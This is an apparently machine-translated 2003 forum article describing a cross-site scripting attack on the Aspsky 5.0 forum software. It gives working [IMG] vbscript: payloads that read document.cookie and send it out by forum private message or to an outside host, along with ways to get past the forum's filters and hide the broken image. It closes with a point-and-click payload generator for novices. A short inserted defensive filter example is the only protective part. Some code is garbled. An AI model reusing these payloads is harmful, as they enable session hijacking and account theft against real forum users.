Author: Czy <czy82@elong.com>
Source: Http://www.nsfocus.net
Date: 2003-09-03
(Note: because the forum mangles some characters in the article, it is best to read the article at Http://www.chinansl.com/czy/xmlhttp.txt and the test code at Http://www.chinansl.com/czy/aspsky5.htm)
Cross-site scripting attacks are presumably familiar to everyone by now, but when stealing a cookie there is always one
problem: you always have to use window.open to pop a form out and send the cookie, so stealthiness
suffers a lot. I once came up with a way to inject HTML statements into a web page using the insertAdjacentHTML method.
That method lets the cookie be sent without an IE window appearing, but in actual use it sometimes caused IE errors.
Isn't there a better way? Earlier, while studying the auto-upgrade of VBS viruses, I used the Microsoft.XMLHTTP
control (it is present by default on Win98/2k, and it is a control that IE considers safe!). Through it we
can send an HTTP request, either POST or GET, to a web site from within a web page.
All right, the train of thought has come this far; let us try it in practice, taking Aspsky 5.0 0320 as the example.
We know that in SRC we can write vbscript: statements, such as:
This one will give an error!
What is the solution? In VBS we can use the EXECUTE statement, and in JS we can use eval!
For example:
or
Are you dizzy yet? You may notice above that the double quotes inside the VBS EXECUTE statement are replaced with "". This is because:
in VBS a string is enclosed in double quotes, and a double quote that appears inside the string must be written as two double quotes, one standing for the other!
So we cannot use single quotes in the EXECUTE statement, and if we used a plain " it would be matched by HTML
against the quote in src=", so we can only use "" instead.
With the quote problem solved, in practical use Aspsky also processes our code:
1: If the string script is found, a space is inserted in front of it
2: If the string http is found, it is treated as a URL and <A> elements are added on both sides
3: If a space is found, it is replaced
Solutions:
1: Replace vbscript with VBScript
2: Replace http with "HT"+"TP" (in VBS the quotes inside a quoted string are doubled, and + is the concatenation operator)
3: Substitute for the space (note which substitution is used)
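As an added defensive illustration (not part of the original article, and not Aspsky's own code): the filter described above matches literal substrings, which is why a change of case or a split string gets past it. The block below contrasts a substring blacklist modelled on that behaviour with an allowlist check that parses the scheme of the [img] URL; the sample inputs are constructed.

```python
import re
from urllib.parse import urlsplit

# Weak filter modelled on the behaviour the article describes for Aspsky:
# a case-sensitive substring match on "script" that breaks the word with a space.
def weak_bbcode_img_filter(src: str) -> str:
    """Blacklist-style filter: breaks the literal string 'script' and nothing else."""
    return src.replace("script", "scr ipt")

ALLOWED_SCHEMES = {"http", "https"}

def is_safe_img_url(src: str) -> bool:
    """Allowlist check for an [img] URL: only absolute http(s) URLs pass.

    - strips ASCII control characters and whitespace that browsers ignore
      inside a scheme, so 'vb<TAB>script:' is seen as 'vbscript:'
    - parses the scheme case-insensitively instead of hunting for forbidden words
    - rejects anything with no scheme, a non-http(s) scheme, or no host
    """
    cleaned = re.sub(r"[\x00-\x20\x7f]", "", src)
    parts = urlsplit(cleaned)
    return parts.scheme.lower() in ALLOWED_SCHEMES and bool(parts.netloc)

# Constructed inputs mirroring the case and splitting tricks the article describes
SAMPLES = {
    "http://example.invalid/pic.gif": True,   # ordinary image URL
    'VBScript:execute("x")': False,           # case change defeats the substring filter
    'vb\tscript:execute("x")': False,         # control char inside the scheme
    "javascript:alert(1)": False,             # other non-http scheme
    "/relative/pic.gif": False,               # no scheme at all
}

def check_samples() -> dict:
    """Run the allowlist check over every constructed sample."""
    return {s: is_safe_img_url(s) for s in SAMPLES}
```

The weak filter leaves "VBScript:" untouched, while the allowlist check rejects every non-http(s) sample regardless of case or inserted whitespace.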
The last question is sending the cookie:
1: Locally the control can GET/POST to any web site, but inside a web page it can only
GET/POST to the current server .... Otherwise IE reports access denied!
2: The cookie cannot contain & or other characters that have a special meaning in a URL
Solutions:
1: If only the current server is allowed, then send the cookie to the mailbox of a user you registered on the forum:
2: replace(Document.cookie,""&"",""-"") in VBS
Replace is the replacement function; in the example I replaced "&" with "-"
The problem is solved; here are the actual examples:
Dynamic Network (Aspsky) 5.0 0320 tested successfully
//----------------------
[Img]vbscript:execute ("Dat=replace" (Document.cookie, "&", ""-""): Set Http=createobject ("" Microsoft.XMLHTTP "" ): Http.open "" Get "", "" HT "" + "" Tp://www.hd315.gov.cn/gcs/19qu/yanqing/bbs/usersms.asp?action=send&touser=czy &title=news&submit= send &message= "" &dat,false:http.send ") [/IMG]
Note: sends the cookie to user Czy, with mail title "news"
//----------------------
Normal use of the control, another way:
<script language=vbs>
Dat=document.cookie
Set Http=createobject ("Microsoft.XMLHTTP")
Http.open "POST", "http://www.chinansl.com/czy/get.asp?cook=" &dat,false
Http.send
Tt=http.responsetext
MsgBox tt
</script>
To make the code more perfect: the cookie now arrives obediently in our mailbox, but there is a small problem. Because the picture does not
display normally, it shows a small broken-image icon, and hovering over it gives the tip "click here to browse the picture in a new window" ... That will make people
suspicious.
Solution idea:
All IMG elements in a web page can be enumerated through document.images, and their size can be set; when width=0
this is equivalent to hidden. By checking whether the SRC attribute of an element contains "Ript", we can determine whether it is our picture. In addition,
> is written with its substitute, and 0 with its substitute!
Code:
[Img]vbscript:execute ("For each AA in Document.images:if InStr (Aa.src," "Ript" ") >0 then:aa.width=0:end if:next") [/ IMG]
Actual code applied:
[Img]vbscript:execute ("For each AA in Document.images:if InStr (Aa.src," "Ript" ") >0 Then:aa.width=0:end Replace (Document.cookie, "&", ""-""): Set Http=createobject ("" Microsoft.XMLHTTP "): Http.open" "Get" "," "HT" "+" "Tp://www.hd315.gov.cn/gcs/19qu/yanqing/bbs/usersms.asp?action=send&touser=czy&title=alll&submit= Send &message= "" &dat,false:http.send ") [/IMG]
-------------------easy to use for rookies :)
<ptml>
<script language=vbs>
Sub Changeq ()
If form1.loc.value= "" or Form1.who.value= "" Then
MsgBox "No Do you have an add address or username? "
Exit Sub
End If
Loc=form1.loc.value
user=form1.who.value
str= "[Img]vbscript:execute (" For each AA in Document.image S:if InStr (AA.SRC, "Ript") >0 then:aa.width=0:end (If:next:dat=replace, "&", ""-""): Set HTTP =createobject ("" "Microsoft.XMLHTTP"): Http.open "" Get "", "" HT "" + "" tp://"&loc&"/usersms.asp?action=send &touser= "&user&" &title=news&submit= send &message= "&dat,false:http.send") [/IMG] "
Form1.area.value=str
End Sub
</script>
<body>
<font size=5 Color=red>aspsky 5.0 0320 Cooki Collector- Czy
<form name=form1>
Settings send address: <input type=text name=loc send address like: Size=50>▲ (Www.nnit30.com/newbbs is web site The installation directory of the forum in the end do not add/, also do not http://headers)
sent user name: <input type=text name=who size=20>-------------<input Type=button name=c hange value= generates code ONCLICK=CHANGEQ () >
Generation generationCode:)
<textarea name=area rows=10 cols=100></textarea>
</form>
</body>
</ptml>